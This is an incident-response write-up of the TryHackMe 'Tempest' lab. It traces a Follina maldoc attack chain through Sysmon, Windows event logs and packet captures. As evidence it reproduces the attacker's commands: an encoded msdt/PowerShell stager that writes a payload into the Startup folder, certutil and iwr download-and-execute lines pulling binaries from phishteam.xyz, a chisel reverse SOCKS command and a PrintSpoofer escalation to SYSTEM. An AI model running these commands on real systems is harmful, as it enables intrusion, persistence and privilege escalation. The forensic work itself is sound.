Tempest
You are tasked to conduct an investigation from a workstation affected by a full attack chain.
CONTEXT
I. Background
In this incident, you will act as an Incident Responder from an alert triaged by one of your Security Operations Center analysts. The analyst has confirmed that the alert has a CRITICAL severity that needs further investigation.
Challenge Link: TryHackMe - Tempest
II. Tools and Artifacts
Conversion of Log Files
Conversion of EVTX files to JSON using EvtxECmd:
PS> .\EvtxECmd\EvtxECmd.exe -f sysmon.evtx --json .\ --jsonf sysmon.json
Metrics (including dropped events)
Event ID Count
1 238
2 2
3 92
5 3
8 3
11 1,024
12 186
13 869
15 6
22 136
PS> .\EvtxECmd\EvtxECmd.exe -f windows.evtx --json .\ --jsonf windows.json
Metrics (including dropped events)
Event ID Count
1102 1
4624 43
4625 4
4648 9
4720 2
4722 2
4724 3
4728 2
4732 3
4738 3
4797 34
4798 27
4799 12
5379 51
5382 2
Protocol Heirarchy (pcap)
$ tshark -r capture.pcapng | sed -e 's/^[ ]*\w*\s*//g' | sed -E 's/\s{2,}/ /g' | cut -d' ' -f5 | sort | uniq -c | sort -bnr
16305 TCP
1883 TLSv1.2
1709 HTTP
734 WebSocket
548 TLSv1.3
21 TLSv1
13 HTTP/XML
6 SSL
ANALYSIS
I. Initial Access
MALICIOUS DOCUMENT
As reported by the SOC analyst, the intrusion started from a malicious document. In addition, the analyst compiled the essential information generated by the alert as listed below:
The malicious document has a .doc extension.
The user downloaded the malicious document via chrome.exe.
The malicious document then executed a chain of commands to attain code execution.
A maldoc was found to be downloaded into the workstation via browser. This was confirmed via logs pertaining to file creation (Sysmon Event ID 11) with its source coming from chrome.exe
.
$ cat sysmon.json | grep EventId..11 | grep chrome.exe | grep ".doc" | jq -r '.Payload' | jq -r '[.EventData.Data[] | select(."@Name" | test("^Image|^TargetFilename|^CreationUtcTime"))] | to_entries | map({(.value."@Name"): (.value."#text")}) | .[0]*.[1]*.[2]'
{
"Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
"TargetFilename": "C:\\Users\\benimaru\\Downloads\\free_magicules.doc:Zone.Identifier",
"CreationUtcTime": "2022-06-20 17:12:56.193"
}
The file was downloaded from phishteam.xyz
(167.71.199.191):
$ tshark -r capture.pcapng -Y "http" | grep free_magicules.doc
1367 89.506977 192.168.254.107 → 167.71.199.191 HTTP 595 GET /02dcf07/free_magicules.doc HTTP/1.1
$ tshark -r capture.pcapng -Y 'frame matches "free_magicules.doc"' -T json | jq -r '.[]."_source".layers.http | with_entries(if (.key|test("http.*")) then ({key: .key, value: .value}) else empty end)'
{
"http.host": "phishteam.xyz",
"http.request.line": "If-Modified-Since: Mon, 20 Jun 2022 16:01:32 GMT\r\n",
"http.connection": "keep-alive",
"http.user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36",
"http.accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"http.accept_encoding": "gzip, deflate",
"http.accept_language": "en-US,en;q=0.9",
"http.request.full_uri": "http://phishteam.xyz/02dcf07/free_magicules.doc",
"http.request": "1",
"http.request_number": "1"
}
The file, free_magicules.doc
, was then opened via Microsoft Word (WINWORD.EXE
):
$ cat sysmon.json | grep EventId..1, | grep free_magicules | jq -r '.Payload' | jq -r '[.EventData.Data[] | select(."@Name" | test("^Image|^CommandLine|^User|^Hashes|^(ParentP|P)rocessId|^UtcTime"))] | to_entries | map({(.value."@Name"): (.value."#text")}) | add'
{
"UtcTime": "2022-06-20 17:13:12.410",
"ProcessId": "496",
"Image": "C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
"CommandLine": "\"C:\\Program Files (x86)\\Microsoft Office\\Root\\Office16\\WINWORD.EXE\" /n \"C:\\Users\\benimaru\\Downloads\\free_magicules.doc\" /o \"\"",
"User": "TEMPEST\\benimaru",
"Hashes": "MD5=09B09DC651D921FE022B16C234E64A12,SHA256=E25F32401FD3D25958B8B99F280F0325B232E54F185CC5D6E0710923005AC64A,IMPHASH=744185317F5DAAFAEB367DDD2932CC02",
"ParentProcessId": "6596"
}
Spawning from the Microsoft Word process was an execution of msdt.exe
which is highly indicative of the Follina 0-day exploit (CVE-2022-30190).
$ cat sysmon.json | grep EventId..1, | grep -i "id..496" | jq -r '.Payload' | jq -r '[.EventData.Data[] | select(."@Name" | test("^Image|^CommandLine|^User|^Hashes|^(ParentP|P)rocessId|^UtcTime"))] | to_entries | map({(.value."@Name"): (.value."#text")}) | add'
{
"UtcTime": "2022-06-20 17:13:35.180",
"ProcessId": "4868",
"Image": "C:\\Windows\\SysWOW64\\msdt.exe",
"CommandLine": "C:\\Windows\\SysWOW64\\msdt.exe ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JGFwcD1bRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdBcHBsaWNhdGlvbkRhdGEnKTtjZCAiJGFwcFxNaWNyb3NvZnRcV2luZG93c1xTdGFydCBNZW51XFByb2dyYW1zXFN0YXJ0dXAiOyBpd3IgaHR0cDovL3BoaXNodGVhbS54eXovMDJkY2YwNy91cGRhdGUuemlwIC1vdXRmaWxlIHVwZGF0ZS56aXA7IEV4cGFuZC1BcmNoaXZlIC5cdXBkYXRlLnppcCAtRGVzdGluYXRpb25QYXRoIC47IHJtIHVwZGF0ZS56aXA7Cg=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\"",
"User": "TEMPEST\\benimaru",
"Hashes": "MD5=4EBC38519675FB0BA6915D0D8A7FCD01,SHA256=1BE8AFD2962596807611E6A8836952D6BBDC24BDE52A34905006FF78F1AD5D12,IMPHASH=AF42CCE29BF30BC07C0496AF0420FD91",
"ParentProcessId": "496"
}
Exploring the CommandLine
parameter for the possible Follina Exploit, the payload contains a base64 encoded bit:
C:\Windows\SysWOW64\msdt.exe ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JGFwcD1bRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdBcHBsaWNhdGlvbkRhdGEnKTtjZCAiJGFwcFxNaWNyb3NvZnRcV2luZG93c1xTdGFydCBNZW51XFByb2dyYW1zXFN0YXJ0dXAiOyBpd3IgaHR0cDovL3BoaXNodGVhbS54eXovMDJkY2YwNy91cGRhdGUuemlwIC1vdXRmaWxlIHVwZGF0ZS56aXA7IEV4cGFuZC1BcmNoaXZlIC5cdXBkYXRlLnppcCAtRGVzdGluYXRpb25QYXRoIC47IHJtIHVwZGF0ZS56aXA7Cg=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe"
Which when decoded, becomes the following (beautified):
$app=[Environment]::GetFolderPath('ApplicationData');
cd "$app\Microsoft\Windows\Start Menu\Programs\Startup";
iwr http://phishteam.xyz/02dcf07/update.zip -outfile update.zip;
Expand-Archive .\update.zip -DestinationPath .;
rm update.zip;
The decoded payload downloads and adds a file, update.zip
, to the Startup
folder which is then extracted to the same directory. The execution being done in PowerShell as well as having sdiagnhost.exe
writing the file to the Startup
folder confirms the abuse of the Follina exploit.
$ cat sysmon.json | grep EventId..11 | grep update.zip | jq -r '.Payload' | jq -r '[.EventData.Data[] | select(."@Name" | test("^Image|^TargetFilename|^CreationUtcTime"))] | to_entries | map({(.value."@Name"): (.value."#text")}) | add'
{
"Image": "C:\\Windows\\SysWOW64\\sdiagnhost.exe",
"TargetFilename": "C:\\Users\\benimaru\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\update.zip",
"CreationUtcTime": "2022-06-20 17:13:37.822"
}
STAGE 2 EXECUTION
Based on the initial findings, we discovered that there is a stage 2 execution:
The document has successfully executed an encoded base64 command.
Decoding this string reveals the exact command chain executed by the malicious document.
As the file, update.zip
, was written in the Startup
folder, login activities of the compromised user (benimaru
) were monitored and processes spawned by winlogon.exe
were traced.
$ cat sysmon.json | grep EventId..1, | grep -i "winlogon.exe" | grep benimaru | jq -r '.Payload' | jq -r '[.EventData.Data[] | select(."@Name" | test("^Image|^(ParentC|C)ommandLine|^User|^Hashes|^(ParentP|P)rocessId|^UtcTime"))] | to_entries | map({(.value."@Name"): (.value."#text")}) | add'
{
"UtcTime": "2022-06-20 17:12:24.262",
"ProcessId": "5968",
"Image": "C:\\Windows\\System32\\userinit.exe",
"CommandLine": "C:\\Windows\\system32\\userinit.exe",
"User": "TEMPEST\\benimaru",
"Hashes": "MD5=BF8825D08BC235F0609CA8BBEF4E179C,SHA256=1FE7F7C59EC7EAA276739FA85F7DDA6136D81184E0AEB385B6AC9FEAAA8C4394,IMPHASH=8419D97ABDFEB6C320F0C39028647572",
"ParentProcessId": "5612",
"ParentCommandLine": "winlogon.exe"
}
{
"UtcTime": "2022-06-20 17:14:50.535",
"ProcessId": "3408",
"Image": "C:\\Windows\\System32\\userinit.exe",
"CommandLine": "C:\\Windows\\system32\\userinit.exe",
"User": "TEMPEST\\benimaru",
"Hashes": "MD5=BF8825D08BC235F0609CA8BBEF4E179C,SHA256=1FE7F7C59EC7EAA276739FA85F7DDA6136D81184E0AEB385B6AC9FEAAA8C4394,IMPHASH=8419D97ABDFEB6C320F0C39028647572",
"ParentProcessId": "1396",
"ParentCommandLine": "winlogon.exe"
}
Upon tracing the logs, a PowerShell execution was spawned which leads to the download of a stage 2 payload (first.exe
).
$ cat sysmon.json | grep EventId..1, | grep -i "parent.*id..3408" | jq -r '.Payload' | jq -r '[.EventData.Data[] | select(."@Name" | test("^Image|^(ParentC|C)ommandLine|^User|^Hashes|^(ParentP|P)rocessId|^UtcTime"))] | to_entries | map({(.value."@Name"): (.value."#text")}) | add'
{
"UtcTime": "2022-06-20 17:14:50.606",
"ProcessId": "5784",
"Image": "C:\\Windows\\explorer.exe",
"CommandLine": "C:\\Windows\\Explorer.EXE",
"User": "TEMPEST\\benimaru",
"Hashes": "MD5=2F62005FCEA7430BB871A56F7700F81C,SHA256=B759293373A11D1A972873A902BC64B2C9690AB947CE4A185CD047195521296D,IMPHASH=0B98A47B3DAF2EE45939EF2A0F188959",
"ParentProcessId": "3408",
"ParentCommandLine": "C:\\Windows\\system32\\userinit.exe"
}
$ cat sysmon.json | grep EventId..1, | grep -i "parent.*id..5784" | jq -r '.Payload' | jq -r '[.EventData.Data[] | select(."@Name" | test("^Image|^(ParentC|C)ommandLine|^User|^Hashes|^(ParentP|P)rocessId|^UtcTime"))] | to_entries | map({(.value."@Name"): (.value."#text")}) | add'
[..omitted..]
{
"UtcTime": "2022-06-20 17:15:10.547",
"ProcessId": "9052",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -w hidden -noni certutil -urlcache -split -f 'http://phishteam.xyz/02dcf07/first.exe' C:\\Users\\Public\\Downloads\\first.exe; C:\\Users\\Public\\Downloads\\first.exe",
"User": "TEMPEST\\benimaru",
"Hashes": "MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F",
"ParentProcessId": "5784",
"ParentCommandLine": "C:\\Windows\\Explorer.EXE"
}
Looking at the command executed, the payload was downloaded to the Public Downloads folder.
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -noni certutil -urlcache -split -f 'http://phishteam.xyz/02dcf07/first.exe' C:\Users\Public\Downloads\first.exe; C:\Users\Public\Downloads\first.exe
The logs shown below proves the successful download and execution of first.exe
:
$ cat sysmon.json | grep EventId..11 | grep first.exe | jq -r '.Payload' | jq -r '[.EventData.Data[] | select(."@Name" | test("^Image|^TargetFilename|^CreationUtcTime|^UtcTime"))] | to_entries | map({(.value."@Name"): (.value."#text")}) |
add'
{
"UtcTime": "2022-06-20 17:15:14.096",
"Image": "C:\\Windows\\system32\\certutil.exe",
"TargetFilename": "C:\\Users\\Public\\Downloads\\first.exe",
"CreationUtcTime": "2022-06-20 14:29:54.049"
}
$ cat sysmon.json | grep EventId..1, | grep benimaru | jq -r '.Payload' | jq -r '[.EventData.Data[] | select(."@Name" | test("^Image|^(ParentC|C)ommandLine|^User|^Hashes|^(ParentP|P)rocessId|^UtcTime"))] | to_entries | map({(.value."@Name"): (.value."#text")}) | add | select(.Image | test(".*first.exe"))'
{
"UtcTime": "2022-06-20 17:15:14.129",
"ProcessId": "8948",
"Image": "C:\\Users\\Public\\Downloads\\first.exe",
"CommandLine": "\"C:\\Users\\Public\\Downloads\\first.exe\"",
"User": "TEMPEST\\benimaru",
"Hashes": "MD5=C9AA36F483B61CFA9758C44ACDB776AC,SHA256=CE278CA242AA2023A4FE04067B0A32FBD3CA1599746C160949868FFC7FC3D7D8,IMPHASH=468991D410EEFBCFB478FB910DDA2CE2",
"ParentProcessId": "9052",
"ParentCommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -w hidden -noni certutil -urlcache -split -f 'http://phishteam.xyz/02dcf07/first.exe' C:\\Users\\Public\\Downloads\\first.exe; C:\\Users\\Public\\Downloads\\first.exe"
}
Network logs included in Sysmon shows that the execution of first.exe
creates a callback to resolvecyber.xyz
(167.71.222.162) at port 80:
$ cat sysmon.json | grep EventId..3, | grep first.exe | jq -r '.Payload' | jq -r '[.EventData.Data[] | select(."@Name" | test("^Image|^U|^Source(Ip|Port)|^Destination(Ip|Port)"))] | to_entries | map({(.value."@Name"): (.value."#text")}) | add' | grep -E "Destination" | sort | uniq
"DestinationIp": "167.71.222.162",
"DestinationPort": "80",
"DestinationPortName": "http"
$ tshark -r capture.pcapng -Y "ip.dst==167.71.222.162 and http" -T json | jq -r '.[]."_source".layers.http | with_entries(if (.key|test("http.host")) then ({key: .key, value: .value}) else empty end)' | grep http.host | uniq
"http.host": "resolvecyber.xyz"
"http.host": "resolvecyber.xyz:8080"
MALICIOUS DOCUMENT TRAFFIC
Based on the collected findings, we discovered that the attacker fetched the stage 2 payload remotely:
We discovered the Domain and IP invoked by the malicious document on Sysmon logs.
There is another domain and IP used by the stage 2 payload logged from the same data source.
Network traffic related to the execution of first.exe
shows requests to the URI path /9ab62b5
:
$ tshark -r capture.pcapng -Y "ip.dst==167.71.222.162 and http" | head -n 1
5159 227.738875 192.168.254.107 → 167.71.222.162 HTTP 161 GET /9ab62b5 HTTP/1.1
$ tshark -r capture.pcapng -Y "frame.number==5159" -T json | jq -r '.[]."_source".layers.http | with_entries(if (.key|test("http.*")) then ({key: .key, value: .value}) else empty end)'
{
"http.host": "resolvecyber.xyz",
"http.request.line": "user-agent: Nim httpclient/1.6.6\r\n",
"http.connection": "Keep-Alive",
"http.user_agent": "Nim httpclient/1.6.6",
"http.request.full_uri": "http://resolvecyber.xyz/9ab62b5",
"http.request": "1",
"http.request_number": "1"
}
Requests with the GET parameter, ?q=
, are also seen with base64 encoded payloads.
$ tshark -r capture.pcapng -Y "ip.dst==167.71.222.162 and http" -T fields -e http.request.uri
/9ab62b5
/9ab62b5?q=d2hvYW1pIC0gdGVtcGVzdFxiZW5pbWFydQ0K
/9ab62b5
/9ab62b5?q=cHdkIC0gDQpQYXRoICAgICAgICAgICAgICAgDQotLS0tICAgICAgICAgICAgICAgDQpDOlxXaW5kb3dzXHN5c3RlbTMyDQoNCg0K
/9ab62b5
[..omitted..]
II. Discovery
Based on the collected findings, we have discovered that the malicious binary continuously uses the C2 traffic:
We can easily decode the encoded string in the network traffic.
The traffic contains the command and output executed by the attacker.
HTTP requests with base64 encoded payloads were parsed and decoded using the following command:
$ for i in $(tshark -r capture.pcapng -Y '(ip.dst==167.71.222.162 and tcp.port eq 80) and frame contains "?q="' -T fields -e http.request.uri | cut -d'=' -f2); do
> echo $i | base64 -d;
> done
The threat actor was then seen to have achieved Remote Code Execution (RCE) with a non-interactive webshell. Initial enumeration included their current user context, existing user directories, as well as local users and administrators:
> whoami
tempest\benimaru
> pwd
Path
----
C:\Windows\system32
> dir C:\Users
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 6/20/2022 9:06 PM benimaru
d-r--- 6/20/2022 4:03 PM Public
d----- 6/20/2022 11:52 PM rimuru
> net users
User accounts for \\TEMPEST
-------------------------------------------------------------------------------
Administrator benimaru DefaultAccount
Guest rimuru WDAGUtilityAccount
The command completed successfully.
> net localgroup administrators -
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
rimuru
The command completed successfully.
> net user benimaru
User name benimaru
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 6/20/2022 9:18:04 PM
Password expires Never
Password changeable 6/20/2022 9:18:04 PM
Password required No
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 6/21/2022 1:14:49 AM
Logon hours allowed All
Local Group Memberships *Remote Management Use*Users
Global Group memberships *None
The command completed successfully.
Next, they began exploring the current user context's home directory:
> dir C:\Users\benimaru -
Directory: C:\Users\benimaru
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 6/20/2022 4:13 PM 3D Objects
d-r--- 6/20/2022 4:13 PM Contacts
d-r--- 6/21/2022 12:27 AM Desktop
d-r--- 6/20/2022 9:20 PM Documents
d-r--- 6/21/2022 1:13 AM Downloads
d-r--- 6/20/2022 4:13 PM Favorites
d-r--- 6/20/2022 4:13 PM Links
d-r--- 6/20/2022 4:13 PM Music
dar--- 6/21/2022 1:15 AM OneDrive
d-r--- 6/20/2022 4:13 PM Pictures
d-r--- 6/20/2022 4:13 PM Saved Games
d-r--- 6/20/2022 4:13 PM Searches
d-r--- 6/20/2022 5:57 PM Videos
> dir C:\Users\benimaru\documents
> dir C:\users\benimaru\Desktop -
Directory: C:\users\benimaru\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/20/2022 11:34 PM 268 automation.ps1
-a---- 6/20/2022 4:13 PM 1446 Microsoft Edge.lnk
> cat C:\Users\Benimaru\Desktop\automation.ps1
A file, automation.ps1
, was discovered which includes the user, benimaru
's, credentials in plaintext:
$user = "TEMPEST\benimaru"
$pass = "infernotempest"
$securePassword = ConvertTo-SecureString $pass -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $user, $securePassword
## TODO: Automate easy tasks to hack working hours
Following the user enumeration, network-related information were then gathered:
> netstat -ano -p tcp
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 864
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING 5508
TCP 0.0.0.0:5357 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:7680 0.0.0.0:0 LISTENING 4964
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 476
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 1212
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1760
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 2424
TCP 0.0.0.0:49671 0.0.0.0:0 LISTENING 624
TCP 0.0.0.0:49676 0.0.0.0:0 LISTENING 608
TCP 192.168.254.107:139 0.0.0.0:0 LISTENING 4
TCP 192.168.254.107:51802 52.139.250.253:443 ESTABLISHED 3216
TCP 192.168.254.107:51839 34.104.35.123:80 TIME_WAIT 0
TCP 192.168.254.107:51858 104.101.22.128:80 TIME_WAIT 0
TCP 192.168.254.107:51860 20.205.146.149:443 TIME_WAIT 0
TCP 192.168.254.107:51861 204.79.197.200:443 ESTABLISHED 4352
TCP 192.168.254.107:51871 20.190.144.169:443 TIME_WAIT 0
TCP 192.168.254.107:51876 52.178.17.2:443 ESTABLISHED 4388
TCP 192.168.254.107:51878 20.60.178.36:443 ESTABLISHED 4388
TCP 192.168.254.107:51881 52.109.124.115:443 ESTABLISHED 4388
TCP 192.168.254.107:51882 52.139.154.55:443 ESTABLISHED 4388
TCP 192.168.254.107:51884 40.119.211.203:443 ESTABLISHED 4388
TCP 192.168.254.107:51895 52.152.90.172:443 ESTABLISHED 5508
TCP 192.168.254.107:51896 20.44.229.112:443 ESTABLISHED 8904
Finally, the threat actor downloaded chisel (a socks proxy application) into the workstation:
> powershell iwr http://phishteam.xyz/02dcf07/ch.exe -outfile C:\Users\benimaru\Downloads\ch.exe - base64: invalid input
> dir C:\Users\benimaru\Downloads\ch.exe -
Directory: C:\Users\benimaru\Downloads
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/21/2022 1:17 AM 8230912 ch.exe
A reverse socks proxy to 167.71.199.191:8080
was started:
$ cat sysmon.json | grep EventId..1, | grep benimaru | jq -r '.Payload' | jq -r '[.EventData.Data[] | select(."@Name" | test("^Image|^(ParentC|C)ommandLine|^User|^Hashes|^(ParentP|P)rocessId|^UtcTime"))] | to_entries | map({(.value."@Name"): (.value."#text")}) | add | select(.Image | test(".*ch.exe"))'
{
"UtcTime": "2022-06-20 17:18:48.723",
"ProcessId": "7388",
"Image": "C:\\Users\\benimaru\\Downloads\\ch.exe",
"CommandLine": "\"C:\\Users\\benimaru\\Downloads\\ch.exe\" client 167.71.199.191:8080 R:socks",
"User": "TEMPEST\\benimaru",
"Hashes": "MD5=527C71C523D275C8367B67BBEBF48E9F,SHA256=8A99353662CCAE117D2BB22EFD8C43D7169060450BE413AF763E8AD7522D2451,IMPHASH=C7269D59926FA4252270F407E4DAB043",
"ParentProcessId": "8948",
"ParentCommandLine": "\"C:\\Users\\Public\\Downloads\\first.exe\""
}
The user, benimaru
, belonging to the Remote Management Users
group as well as having TCP port 5985 open in his workstation may have given the threat actor remote access via WinRM. The logs below show all Network logons (LogonType 3) of the compromised user:
$ cat windows.json | grep -E 'EventId..4624' | grep 'benimaru' | grep -i "type 3" | jq -r '{LogonType: .PayloadData2, UserName: .PayloadData1, Time: .TimeCreated}'
{
"LogonType": "LogonType 3",
"UserName": "Target: TEMPEST\\benimaru",
"Time": "2022-06-20T17:19:05.7222347+00:00"
}
{
"LogonType": "LogonType 3",
"UserName": "Target: TEMPEST\\benimaru",
"Time": "2022-06-20T17:20:06.2574361+00:00"
}
{
"LogonType": "LogonType 3",
"UserName": "Target: TEMPEST\\benimaru",
"Time": "2022-06-20T17:21:05.5133859+00:00"
}
{
"LogonType": "LogonType 3",
"UserName": "Target: TEMPEST\\benimaru",
"Time": "2022-06-20T17:21:33.8813884+00:00"
}
III. Privilege Escalation
Based on the collected findings, the attacker gained a stable shell through a reverse socks proxy.
Executions were seen in the Sysmon logs but not in the captured network traffic. This leads to the assumption that the threat actor was able to establish a stable shell via WinRM.
The first execution was enumeration of privileges for the current user context (benimaru
):
{
"UtcTime": "2022-06-20 17:19:16.266",
"ProcessId": "2068",
"Image": "C:\\Windows\\System32\\whoami.exe",
"CommandLine": "\"C:\\Windows\\system32\\whoami.exe\" /priv",
"User": "TEMPEST\\benimaru",
"Hashes": "MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88",
"ParentProcessId": "6204",
"ParentCommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" whoami /priv"
}
Afterwhich, the files, spf.exe
and final.exe
, were downloaded into the workstation:
{
"UtcTime": "2022-06-20 17:20:06.648",
"ProcessId": "6804",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" iwr http://phishteam.xyz/02dcf07/spf.exe -outfile spf.exe",
"User": "TEMPEST\\benimaru",
"Hashes": "MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F",
"ParentProcessId": "4208",
"ParentCommandLine": "C:\\Windows\\system32\\wsmprovhost.exe -Embedding"
}
{
"UtcTime": "2022-06-20 17:21:05.827",
"ProcessId": "3712",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" iwr http://phishteam.xyz/02dcf07/final.exe -outfile C:\\ProgramData\\final.exe",
"User": "TEMPEST\\benimaru",
"Hashes": "MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F",
"ParentProcessId": "4208",
"ParentCommandLine": "C:\\Windows\\system32\\wsmprovhost.exe -Embedding"
}
spf.exe
was executed (to run final.exe
after the fact) and based on the executable's hash was found to be a printspoofer exploit which abuses impersonation privileges (SeImpersonatePrivilege). The threat actor must have been tipped off after enumerating user privileges.
{
"UtcTime": "2022-06-20 17:21:34.192",
"ProcessId": "6828",
"Image": "C:\\Users\\benimaru\\Downloads\\spf.exe",
"CommandLine": "\"C:\\Users\\benimaru\\Downloads\\spf.exe\" -c C:\\ProgramData\\final.exe",
"User": "TEMPEST\\benimaru",
"Hashes": "MD5=108DA75DE148145B8F056EC0827F1665,SHA256=8524FBC0D73E711E69D60C64F1F1B7BEF35C986705880643DD4D5E17779E586D,IMPHASH=545A81240793F9CA97306FA5B3AD76DF",
"ParentProcessId": "4208",
"ParentCommandLine": "C:\\Windows\\system32\\wsmprovhost.exe -Embedding"
}
{
"UtcTime": "2022-06-20 17:21:34.268",
"ProcessId": "8264",
"Image": "C:\\ProgramData\\final.exe",
"CommandLine": "C:\\ProgramData\\final.exe",
"User": "NT AUTHORITY\\SYSTEM",
"Hashes": "MD5=4C014F94A8FA0B484A2EDAB422AB2A1A,SHA256=03E1840A24506AFC88AB5FF7F83D2B07B558B34FF42DD34DD93267FD2E7A74E6,IMPHASH=468991D410EEFBCFB478FB910DDA2CE2",
"ParentProcessId": "6828",
"ParentCommandLine": "\"C:\\Users\\benimaru\\Downloads\\spf.exe\" -c C:\\ProgramData\\final.exe"
}
After the execution of final.exe
, network connections were checked on sysmon for possible callbacks and true enough:
$ cat sysmon.json | grep EventId..3, | grep -i final.exe | jq -r '.Payload' | jq -r '[.EventData.Data[] | select(."@Name" | test("^Image|^U|^Source(Ip|Port)|^Destination(Ip|Port)"))] | to_entries | map({(.value."@Name"): (.value."#text")}) | add' | grep -E 'Image|Destination(Ip|Port")' | sort | uniq
"DestinationIp": "167.71.222.162",
"DestinationPort": "8080",
"Image": "C:\\ProgramData\\final.exe",
IV. Post-Exploitation
Now, the attacker has gained administrative privileges inside the machine. Find all persistence techniques used by the attacker.
In addition, the unusual executions are related to the malicious C2 binary used during privilege escalation.
Callbacks to 167.71.222.162:8080
were parsed and decoded using the following command:
$ for i in $(tshark -r capture.pcapng -Y '(ip.dst==167.71.222.162 and tcp.port eq 8080) and frame contains "?q="' -T fields -e http.request.uri | cut -d'=' -f2);
> do echo $i | base64 -d;
> done
Now, the current user context of the threat actor is NT AUTHORITY\SYSTEM
which is the local superadmin of the workstation:
> whoami
nt authority\system
> pwd
Path
----
C:\Windows\system32
> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeCreateTokenPrivilege Create a token object Enabled
SeAssignPrimaryTokenPrivilege Replace a process level token Enabled
SeLockMemoryPrivilege Lock pages in memory Enabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeTcbPrivilege Act as part of the operating system Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeCreatePermanentPrivilege Create permanent shared objects Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeAuditPrivilege Generate security audits Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeTrustedCredManAccessPrivilege Access Credential Manager as a trusted caller Enabled
SeRelabelPrivilege Modify an object label Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
